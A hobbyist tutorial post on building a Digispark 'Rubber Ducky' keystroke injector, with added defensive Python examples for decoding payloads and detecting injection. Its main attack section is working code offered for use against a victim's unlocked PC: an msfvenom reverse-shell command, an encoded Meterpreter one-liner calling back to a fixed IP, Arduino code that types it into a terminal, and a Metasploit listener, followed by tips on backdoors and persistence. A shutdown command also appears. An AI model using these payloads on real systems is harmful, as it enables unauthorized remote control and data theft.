Arduino Rubber Ducky Introduction
Hey guys, let’s get our hands dirty. Ever heard of the USB Rubber Ducky? Simply put, it is a programmed USB keyboard in the form of a pen drive that sends keystrokes to the device it is plugged into and can be used to prank or even hack unlocked PCs.
Would you believe me if I said we can do it with a $1.5 Arduino-compatible board and simple coding, without detailed knowledge of how USB works? Yes, you can make your own Arduino Rubber Ducky!
What will you learn?
In this post, I am going to show you how you can do cool stuff using the Arduino HID functionality. You can make your Arduino work as a keyboard or as a mouse and trigger actions with the push of a button.
Arduino Rubber Ducky Video Tutorial
I will be showing you how you can literally hack a PC and control it remotely using this tiny board. I will share a complete tutorial, code, and circuit diagrams in the description! The code is also available on GitHub, so feel free to download, edit and add more functions to it. Let’s get started!
Digispark – Explained
This is the Digispark. It is a lightweight microcontroller development board. It comes with 6 GPIO pins, I2C and SPI serial communication and a USB interface.
It also has 3 PWM pins which can be used to control L293D motor drivers or servo motors. We can use the Arduino IDE to program the Digispark, but the way we upload the program is a little different than usual.
Here, I have explained everything from the Digispark introduction to the first code upload. Check it out if you are interested!
Digispark as HID
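This board can also act as a HID. Human Interface Devices (HIDs) are devices that take input from us and pass it on to the computer they are connected to. HID devices include keyboards, joysticks, mice, touchpads, graphics tablets, etc. Because the PC treats the board as an ordinary keyboard, anything it types is accepted exactly as if the logged-in user had typed it.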
Let’s make use of this functionality and have some fun.
Steps – Arduino Rubber Ducky
Step 1 – The Circuit
Circuit Explained
I have designed a PCB that has some buttons so that I can run multiple codes without reprogramming the Digispark.
This is the circuit. Since we have 5V coming out of the USB port, we don’t need an additional supply. Here we have some switches, resistors, and indicator LEDs. I will share the link to the PCB files in the description.
Soldering
The PCB will be manufactured and shipped within days and will be delivered to your doorstep within the mentioned time period. Once you get the PCB in hand, all you have to do is solder the header pins and connect all the components.
Step 2 – Installing Digispark Drivers
Now let’s install the drivers, board and library. Go to this link and download the drivers.
https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip
Extract it and install the drivers.
Step 3 – Install and Setting up Arduino IDE
Install Arduino
Download the Arduino IDE if you don’t have it. Download it from: https://www.arduino.cc/en/Main/Software
Install Board
Start the Arduino IDE, go to the “File” menu, select “Preferences” and paste this URL into the Additional Boards Manager URLs field.
http://digistump.com/package_digistump_index.json
Go to “Tools” menu and then the “Board” submenu – select “Boards Manager” and then select “Contributed”. Select the “Digistump AVR Boards” package and click the “Install” button.
Once it completes, close the “Boards Manager” window and go to Tools→Boards and select “Digispark (Default – 16.5mhz)”.
Install Library
Next we will install the DigiKeyboard library, which makes it easy for us to send HID commands to the PC using the Digispark. This can be easily installed from the library manager itself.
Step 4 – Coding
Now we will start coding. Guys, these are all the keystrokes you can send to your PC from the Digispark using the DigiKeyboard library. I will leave the link in the description because you will need it for coding!
DigiKeyboard Library Keystrokes
Special Keys
- MOD_CONTROL_LEFT – Left Ctrl key
- MOD_SHIFT_LEFT – Left Shift key
- MOD_ALT_LEFT – Left Alt key
- MOD_GUI_LEFT – Left Windows key
- MOD_CONTROL_RIGHT – Right Ctrl key
- MOD_SHIFT_RIGHT – Right Shift key
- MOD_ALT_RIGHT – Right Alt key
- MOD_GUI_RIGHT – Right Windows key
Alphabets
- KEY_A
- KEY_B
- KEY_C
- KEY_D
- KEY_E
- KEY_F
- KEY_G
- KEY_H
- KEY_I
- KEY_J
- KEY_K
- KEY_L
- KEY_M
- KEY_N
- KEY_O
- KEY_P
- KEY_Q
- KEY_R
- KEY_S
- KEY_T
- KEY_U
- KEY_V
- KEY_W
- KEY_X
- KEY_Y
- KEY_Z
Numbers
- KEY_1
- KEY_2
- KEY_3
- KEY_4
- KEY_5
- KEY_6
- KEY_7
- KEY_8
- KEY_9
- KEY_0
Functions
- KEY_F1
- KEY_F2
- KEY_F3
- KEY_F4
- KEY_F5
- KEY_F6
- KEY_F7
- KEY_F8
- KEY_F9
- KEY_F10
- KEY_F11
- KEY_F12
Don’t worry if this looks confusing, you will understand better when we look into our code.
Basic Codes
First I will show you the basic setup. Basically, we have 4 different buttons. We will assign 1 task for each button so that when one button is pressed, it will run the corresponding function and execute the task.
#include <DigiKeyboard.h>

int button1, button2, button3, button4;

void setup()
{
  // One input pin per push button
  pinMode(0, INPUT);
  pinMode(1, INPUT);
  pinMode(2, INPUT);
  pinMode(3, INPUT);
}

void loop()
{
  button1 = digitalRead(0);
  button2 = digitalRead(1);
  button3 = digitalRead(2);
  button4 = digitalRead(3);

  // Run the task assigned to whichever button is pressed
  if (button1 == 1)
  {
    hello();
  }
  else if (button2 == 1)
  {
    lock();
  }
  else if (button3 == 1)
  {
    notepad();
  }
  else if (button4 == 1)
  {
    poweroff();
  }
}

// Types "Hello World" followed by Enter
void hello()
{
  DigiKeyboard.sendKeyStroke(0);  // empty keystroke so the first real key is not missed
  DigiKeyboard.println("Hello World");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(5000);
}

// Windows key + L locks the session
void lock()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_L, MOD_GUI_LEFT);
  DigiKeyboard.delay(5000);
}

// Windows key + R opens the Run dialog, then "notepad" + Enter starts Notepad
void notepad()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("notepad");
}

// Opens a command prompt from the Run dialog and types the shutdown command
void poweroff()
{
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(250);
  DigiKeyboard.println("cmd");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("shutdown /s");
}
- The first function types “Hello World”.
- The second function sends “Windows key + L” to lock Windows.
- The third function sends the keystrokes that open Notepad.
- The fourth function sends the keystrokes that shut down the PC.
Let’s upload and check it out.
First press button 1 and yeah! It will print hello world. Now let’s try button 2, which will lock the PC. Now let’s try button 3. Cool, right? I will press button 4 at the end. Otherwise I will have to start everything all over again.
This way you can send keystrokes using your Arduino to do useful things like media control, make your own keyboard, play pranks, or even hack PCs.
Taking Control over a PC
Now, as promised, I will show you how to take over an unlocked PC and gain remote access to it. Please note that this is only for educational purposes and to show you how dangerous this little thing can be.
For this part, you will need a Linux PC with Metasploit installed on it. The Metasploit framework is a collection of tools that can be used to write exploits and penetrate remote machines. This tool is pre-installed in Kali Linux. In a moment, I will show you how it is done.
Creating Payload
Next, we have to create code which, when executed on the victim’s machine, initiates a connection back to our PC.
In the terminal, execute the command below.
msfvenom -p python/meterpreter/reverse_tcp LHOST=<IP ADDRESS OF YOUR MACHINE> LPORT=<PORT FOR REVERSE SHELL TO CONNECT ON> R > pythonpayload.py
Here, LHOST is the IP address of your machine and LPORT is the port for the reverse shell to connect on.
This will create a payload named pythonpayload.py.
The contents of the file look somewhat like this:
import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QKcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCcxMC45LjcuMjA3Jyw5MDAwKSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')))
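For anyone who finds a file like this on a machine, the wrapper can be unpacked without running it. The following is an added example, not code from the original post: it peels the base64 layer and pulls out the address the inner script would connect to. The sample input is constructed (documentation address 192.0.2.10, port 4444) and only has the same shape as the file above; the function names are my own.

```python
import base64
import re

# A quoted run of base64 characters, and a socket connect(('host', port)) call.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
CONNECT_CALL = re.compile(r"""connect\(\(\s*['"]([^'"]+)['"]\s*,\s*(\d+)\s*\)\)""")

def decode_layers(source, max_depth=5):
    """Return [source, decoded layer 1, ...]. Nothing is ever executed."""
    layers = [source]
    for _ in range(max_depth):
        match = B64_LITERAL.search(layers[-1])
        if not match:
            break
        try:
            decoded = base64.b64decode(match.group(1), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            break  # not real base64, or not text: stop peeling
        layers.append(decoded)
    return layers

def callback_endpoints(source):
    """Collect (host, port) pairs passed to connect() in any decoded layer."""
    found = []
    for layer in decode_layers(source):
        for host, port in CONNECT_CALL.findall(layer):
            found.append((host, int(port)))
    return found

# Constructed sample: a harmless inner script wrapped the same way as the file above.
INNER = "import socket\ns=socket.socket()\ns.connect(('192.0.2.10',4444))\n"
SAMPLE = ("import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}"
          "[sys.version_info[0]]('" + base64.b64encode(INNER.encode()).decode() + "')))")

if __name__ == "__main__":
    for host, port in callback_endpoints(SAMPLE):
        print("callback endpoint:", host, port)
```

The extracted host and port are the values to search for in firewall and proxy logs.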
The Arduino Code for Digispark Rubber Ducky
Now open that file and copy all the contents in the file as shown in the video.
Below is the code which is uploaded to the Digispark. Copy the contents of pythonpayload.py and paste it in the 9th line.
#include "DigiKeyboard.h"
void setup()
{
  DigiKeyboard.delay(2000);
  DigiKeyboard.sendKeyStroke(KEY_T, MOD_CONTROL_LEFT | MOD_ALT_LEFT);
  DigiKeyboard.delay(2000);
  DigiKeyboard.println("python ");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("Paste the python code here");
  DigiKeyboard.delay(1000);
  DigiKeyboard.println("quit()");
  DigiKeyboard.delay(500);
  DigiKeyboard.println("exit");
}
void loop()
{
}
Basically, what this code does is
- Wait for 2 seconds
- Press ALT + CONTROL + T to open up the terminal
- Wait for 2 seconds
- Type in ‘python’ and Press Enter to start Python
- Wait for 0.5 seconds
- Type in the python exploit code and press enter to execute it
- Wait for 1 second
- Type ‘quit()’ and press enter to exit python
- Wait for 0.5 seconds
- Type exit and press enter to exit the terminal.
Now, upload the code.
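The sequence above types whole lines at machine speed with fixed pauses in between, and that timing is what keystroke-injection detectors look for. The following is an added example, not code from the original post: it groups key events into bursts and flags long bursts typed faster than a person can. The thresholds, the 8 ms per key injection speed and both traces are constructed assumptions.

```python
from statistics import median

# Assumed thresholds, not taken from the page; tune them against real typing data.
MAX_HUMAN_GAP_MS = 30   # sustained typing faster than this is treated as machine input
MIN_BURST_KEYS = 12     # ignore very short bursts
IDLE_SPLIT_MS = 400     # a pause this long (e.g. a delay() call) starts a new burst

def split_bursts(events):
    """Group (timestamp_ms, char) key events into bursts separated by idle pauses."""
    bursts, current = [], []
    for ts, ch in events:
        if current and ts - current[-1][0] >= IDLE_SPLIT_MS:
            bursts.append(current)
            current = []
        current.append((ts, ch))
    if current:
        bursts.append(current)
    return bursts

def suspicious_bursts(events):
    """Return the text of bursts that are both long and faster than a human types."""
    flagged = []
    for burst in split_bursts(events):
        if len(burst) < MIN_BURST_KEYS:
            continue
        gaps = [b[0] - a[0] for a, b in zip(burst, burst[1:])]
        if median(gaps) < MAX_HUMAN_GAP_MS:
            flagged.append("".join(ch for _, ch in burst))
    return flagged

def synth(text, start_ms, gap_ms):
    """Constructed sample data: evenly spaced key events for `text`."""
    return [(start_ms + i * gap_ms, ch) for i, ch in enumerate(text)]

def sketch_trace(gap_ms=8):
    """Constructed trace shaped like the sketch: four println() calls split by delay()."""
    t, events = 4000, []
    lines = [("python \n", 500), ("<placeholder for the pasted one-liner>\n", 1000),
             ("quit()\n", 500), ("exit\n", 0)]
    for text, pause_ms in lines:
        burst = synth(text, t, gap_ms)
        events += burst
        t = burst[-1][0] + pause_ms
    return events

HUMAN = synth("ls -la /home/user\n", 20000, 180)  # constructed: about 180 ms per key

if __name__ == "__main__":
    for text in suspicious_bursts(sketch_trace() + HUMAN):
        print("possible keystroke injection:", repr(text))
```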
Setting Up the Listener
Next, we have to start the listener, which will wait for incoming connections on the given port. Fire up Metasploit and run the commands below in order.
msfconsole
use multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST <IP ADDRESS OF YOUR MACHINE>
set LPORT <PORT FOR REVERSE SHELL TO CONNECT ON>
exploit
This will start the listener.
Launch the Attack
Now all you have to do is connect this Digispark to the victim’s unlocked machine. All you need is a 10 second window. All the codes will run in 5 seconds.
Once you get the shell, you can do almost anything with it: create a persistent back door, upload or download files, create another user and give it SSH access. The possibilities are endless.
This code works if your friend’s PC runs Linux. Similarly, we can write code for Windows too. The Windows version will be added at the link below. Follow the link in the description and you will find complete details on the project. The code is also available on GitHub, so feel free to download, edit and add more functions to it.
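On the host, the 10 second window described above leaves a recognisable order of events: a new USB keyboard appears, an interpreter starts, and that interpreter opens an outbound connection. The following is an added example, not code from the original post: it correlates those three events. The event schema, field names and sample events are constructed assumptions standing in for normalised kernel, process and network logs.

```python
WINDOW_S = 10  # seconds; taken from the "10 second window" above
INTERPRETERS = {"python", "python3", "bash", "sh"}  # assumed watch list

# Constructed, already-normalised host events: (epoch_seconds, kind, fields).
EVENTS = [
    (1000.0, "usb_hid_keyboard_added", {"device": "usb 1-3"}),
    (1002.1, "process_start", {"pid": 4121, "comm": "gnome-terminal"}),
    (1004.3, "process_start", {"pid": 4130, "comm": "python"}),
    (1005.0, "net_connect", {"pid": 4130, "dest": "192.0.2.10:4444"}),
    (5000.0, "process_start", {"pid": 5001, "comm": "python3"}),
    (5001.0, "net_connect", {"pid": 5001, "dest": "198.51.100.7:443"}),
]

def correlate(events, window_s=WINDOW_S):
    """Alert when an interpreter started soon after a new USB keyboard connects out."""
    alerts, last_keyboard, watched = [], None, {}
    for ts, kind, fields in sorted(events, key=lambda e: e[0]):
        if kind == "usb_hid_keyboard_added":
            last_keyboard = (ts, fields["device"])
        elif kind == "process_start" and fields["comm"] in INTERPRETERS:
            # Only watch interpreters that start inside the window after plug-in.
            if last_keyboard and ts - last_keyboard[0] <= window_s:
                watched[fields["pid"]] = (last_keyboard[1], fields["comm"])
        elif kind == "net_connect" and fields["pid"] in watched:
            device, comm = watched.pop(fields["pid"])
            alerts.append({"device": device, "pid": fields["pid"],
                           "comm": comm, "dest": fields["dest"]})
    return alerts

if __name__ == "__main__":
    for alert in correlate(EVENTS):
        print("new keyboard followed by interpreter callback:", alert)
```

The python3 process that starts long after the keyboard was attached produces no alert, which keeps ordinary scripting from triggering the rule.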
See you soon guys. See you in the next video.